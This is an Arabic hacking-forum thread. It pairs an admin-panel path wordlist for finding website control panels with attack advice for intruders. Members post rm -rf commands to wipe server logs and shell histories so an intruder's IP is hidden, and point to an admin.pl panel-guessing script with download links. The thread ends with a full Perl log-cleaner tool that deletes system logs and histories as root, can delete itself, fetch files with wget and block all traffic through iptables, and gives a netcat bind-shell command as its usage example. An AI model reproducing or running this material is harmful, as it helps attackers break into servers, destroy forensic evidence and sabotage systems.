admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
server.php
server.html
server.asp
server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
database_administration/
webadmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
serveradministrator/
sysadmin/
administer/
liveuser_admin/
sys-admin/
typo3/
panel/
cpanel/
cpanel/
cpanel_file/
platz_login/
rclogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simplelogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
userlogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
lotus_domino_admin/
bbadmin/
vmailadmin/
indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
super-admin/
admintools/
cmsadmin/
sysadmin2/
globes_admin/
cadmins/
phpsqliteadmin/
navsiteadmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/




تحياتي لكم .

المشاركة الأصلية كتبت بواسطة قلب الصخرة (المشاركة 99204) انتظر الاخ فولكانو او احد الاعضاء محترفين اختراق المواقع هذه تحية طيبة لك موفق بإذن الله ... لك مني أجمل تحية .

المشاركة الأصلية كتبت بواسطة T3BaN_HaCkEr (المشاركة 99375) اخوي البرنامج تبع فولكانو الي يخمن لوحات التحكم بعد ما تنزلو اعتقد يطلب منك تحديث لانو هو بدو حزمة على شان يشتغل ما بيشتغل لوحدو على كل حال اذا ما اشتغل عندك هات الموقع وانا بجرب اخمن لوحة التحكم وبالنسبة لملف اللوج ما عندي خبره كثير ان شاء الله الاخوة بفيدوك

المشاركة الأصلية كتبت بواسطة ZrIqE ViRuS (المشاركة 99415) اوامر مسح اللوجز rm -rf / tmp/logs rm -rf $HISTFILE rm -rf / root/.ksh_history rm -rf / root/.bash_history rm -rf / root/.ksh_history rm -rf / root/.bash_logout rm -rf / usr/local/apache/logs rm -rf / usr/local/apache/log rm -rf / var/apache/logs rm -rf / var/apache/log rm -rf / var/run/utmp rm -rf / var/logs rm -rf / var/log rm -rf / var/adm rm -rf / etc/wtmp rm -rf / etc/utmp find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \; قم بتطبيقها كافه بالشل لكن تذكر ان المسح ليس نقي 100% والسبب انه يتم ترك اخر لوجز بعد المسح بالتالي يمكن معرفه الاي بي الخاص بك لكن الاحتمال ضئيل جدا ------------------------ انتينا من الخطوه الاولى ناتي الى الخطوه 2 تريد تخمين مسار لوحه التحكم قم بتحميل برنامج اكتف بريل (برنامج هام جدا جدا لكل هكر ويساعد كثيرا باستغلال الثغرات) وضع الملف (بالمرفقات) admin.pl في قرص السي ثم اذهب لشاشه الدوز من ابدا run cmd -- ثم ادخل الامر التالي cd/ ثم admin.pl سيطلب منك ادخال نوع ملفات الموقع يخيرك بين php , asp انت اختار نوع الموقع وفيك تعرف حسيب نوع الملف المصاب وبعدها رح يخمن لوحده المرفقات http://www.4shared.com/file/21153047...e60/admin.html المزيد من الادوات التي تعمل بنفس الطريقه سيتم الشرح بموضوع منفصل http://www.4shared.com/file/21153065...8b/column.html http://www.4shared.com/file/21153043...3c0/table.html كان عندي اداه رائعه ومميزه لمسح الوجز اعتقد انها بتمسح بنضافه كامله لكن للاسف اضعتها

كان عندي اداه رائعه ومميزه لمسح الوجز اعتقد انها بتمسح بنضافه كامله لكن للاسف اضعتها

#!/usr/bin/perl #================================================= =============# # BH-LSC 1.0 (BH-Linux Server Cleaner Version 1.0) # Coded By: Br4v3-H34r7 # Contact: R00T[AT]Br4v3-H34r7[DOT]CoM # Website: Br4v3-H34r7.CoM | BH2H.CoM # License: GNU General Public License 3 #================================================= =============# # NOT FOR ILLEGAL USAGE - NOT FOR SCRIPT KIDDIES #================================================= =============# # BEGIN THE CODE { $uid = getpwuid($>); # Get User ID if($uid eq "root") # If root { @logs = ("/var/log/lastlog", "/var/log/messages", "/var/log/warn", "/var/log/wtmp", "/var/log/poplog", "/var/log/qmail", "/var/log/smtpd", "/var/log/telnetd", "/var/log/secure", "/var/log/auth", "/var/log/auth.log", "/var/log/cups/access_log", "/var/log/cups/error_log", "/var/log/thttpd_log", "/var/log/spooler", "/var/spool/tmp", "/var/spool/errors", "/var/spool/locks", "/var/log/nctfpd.errs", "/var/log/acct", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/log", "/usr/local/apache/logs", "/usr/local/www/logs/thttpd_log", "/var/log/news", "/var/log/news/news", "/var/log/news.all", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice", "/var/log/news/suck.err", "/var/log/news/suck.notice", "/var/log/xferlog", "/var/log/proftpd/xferlog.legacy", "/var/log/proftpd.xferlog", "/var/log/proftpd.access_log", "/var/log/httpd/error_log", "/var/log/httpsd/ssl_log", "/var/log/httpsd/ssl.access_log", "/var/adm", "/var/run/utmp", "/etc/wtmp", "/etc/utmp", "/etc/mail/access", "/var/log/mail/info.log", "/var/log/mail/errors.log", "/var/log/httpd/*_log", "/var/log/ncftpd/misclog.txt", "/var/account/pacct", "/var/log/snort", "/var/log/bandwidth", "/var/log/explanations", "/var/log/syslog", "/var/log/user.log", "/var/log/daemons/info.log", "/var/log/daemons/warnings.log", "/var/log/daemons/errors.log", "/etc/httpd/logs/error_log", "/etc/httpd/logs/*_log", "/var/log/mysqld/mysqld.log"); # Logs Locations @shells_history = ("/root/.ksh_history", "/root/.bash_history", "/root/.sh_history", "/root/.history", "/root/*_history", "/root/.login", "/root/.logout", "/root/.bash_logut", "/root/.Xauthority"); # Shells History Locations if(@ARGV eq 0) { print "\n\t+--------------------------+\n"; print "\t| BH-LSC 1.0 |\n"; print "\t| Coded By Br4v3-H34r7 |\n"; print "\t| Br4v3-H34r7.CoM|BH2H.CoM |\n"; print "\t+--------------------------+\n\n"; print "[*] FastMode Usage: perl $0 [Seconds] [Command(s)]\n"; print "[*] EXAMPLE: perl $0 30 \"nc -l -p 3434 -e /bin/bash\"\n\n"; print "[+] Start Clean The Server? (Y/N): "; chomp($Clean = <STDIN>); # Get The Answer $LClean = "\L$Clean"; # Make User Input Lowercase Character if($LClean eq "y") # Answer Yes { print "[+] Clean The Server After You Exit? (Y/N): "; chomp($AfterExit = <STDIN>); # Get The Answer $LAfterExit = "\L$AfterExit"; # Make User Input Lowercase Character if($LAfterExit eq "y") # Answer Yes { print "[+] After How Many Time? (Seconds): "; chomp($Seconds = <STDIN>); # Get The Seconds print "[+] Run Custom Command After Cleaning The Logs? (Y/N): "; chomp($RunAfter = <STDIN>); # Get The Answer $LRunAfter = "\L$RunAfter"; # Make User Input Lowercase Character if ($LRunAfter eq "y") # Answer Yes { print " (1) Make This Tool Remove It Self\n"; print " (2) Delete Custom File From The Server\n"; print " (3) Get File To The Server (Using \"wget\")\n"; print " (4) Don't Allow Any Server Connections (Using \"iptables\" Firewall)\n"; print " (5) Use Other Or Multi Commands (Use \";\" Between The Commands)\n"; print "[+] Enter The Number Of Your Choice: "; chomp($theanswer = <STDIN>); # Get The Answer if($theanswer eq 1) # Make This Tool Remove It Self { use Cwd qw(realpath); $toolpath = realpath($0); # Get The Tool Name $command = ("rm -rf \"$toolpath\""); # Set After Exit Command } elsif($theanswer eq 2) # Delete Custom File From The Server { print "[+] Enter File Location: "; chomp($file = <STDIN>); # Get File Location $command = ("rm -rf \"$file\""); # Set After Exit Command } elsif($theanswer eq 3) # Get File To The Server { print "[+] Enter File URL: "; chomp($wget_url = <STDIN>); # Get File URL print "[+] Enter Save Location: "; chomp($wget_location = <STDIN>); # Get Save Location $command = ("wget -O $wget_location $wget_url"); # Set After Exit Command } elsif($theanswer eq 4) # Don't Allow Any Server Connections { print "[+] DANGEROUS This Choice Will Make The Server Drop INPUT/OUTPUT/FORWARD Connections (Y/N): "; chomp($answer5 = <STDIN>); # Get The Answer $Lanswer5 = "\L$answer5"; # Make User Input Lowercase Character if ($Lanswer5 eq "y") # Answer Yes { $command = ("/sbin/iptables -F;/sbin/iptables -P INPUT DROP;/sbin/iptables -P OUTPUT DROP;/sbin/iptables -P FORWARD DROP"); # Set After Exit Command } else # Error Input { print "[!] Error: Wrong Input... Skipped!\n"; } } elsif($theanswer eq 5) # Use Other Or Multi Commands { print "[+] Enter The Command(s): "; chomp($command = <STDIN>); # Set After Exit Command } else # Error Input { print "[!] Error: Wrong Input... Skipped!\n"; } } elsif($LRunAfter eq "n") # Answer No { print "[-] Answer No, Run Custom Command After Cleaning The Logs... Skipped!\n"; } else # Error Input { print "[!] Error: Wrong Input... Skipped!\n"; } print "[+] You Have \"$Seconds\" Seconds To Exit The Server\n"; sleep $Seconds; # Wait For Some Seconds } elsif($LAfterExit eq "n") # Answer No { print "[-] Answer No, Delete Server Logs After Exit... Skipped!\n"; } else # Error Input { print "[!] Error: Wrong Input... Skipped!\n"; } print "[+] Start Cleaning The Server...\n"; sleep 2; # Wait For 2 Seconds unlink @logs; # Deleting System Logs print "[+] Server Logs Deleted Successfully\n"; sleep 2; # Wait For 2 Seconds unlink @shells_history; # Deleting Shells History print "[+] Shells History Deleted Successfully\n\n"; system $command; # Run The Command } elsif($LClean eq "n") # Answer No { print "[-] Answer No, Exit With Out Cleaning... Exit!\n"; } else # Error Input { print "[!] Error: Wrong Input... Exit!\n"; } } else # FastMode { sleep $ARGV[0]; # Wait For Some Seconds unlink @logs; # Deleting System Logs unlink @shells_history; # Deleting Shells History system $ARGV[1]; # Run The Command(s) } } else # If Not root { print "[!] Error: You Must Be Server \"root\" To Use This Tool... Exit!\n"; } } # END THE CODE #================================================= =============#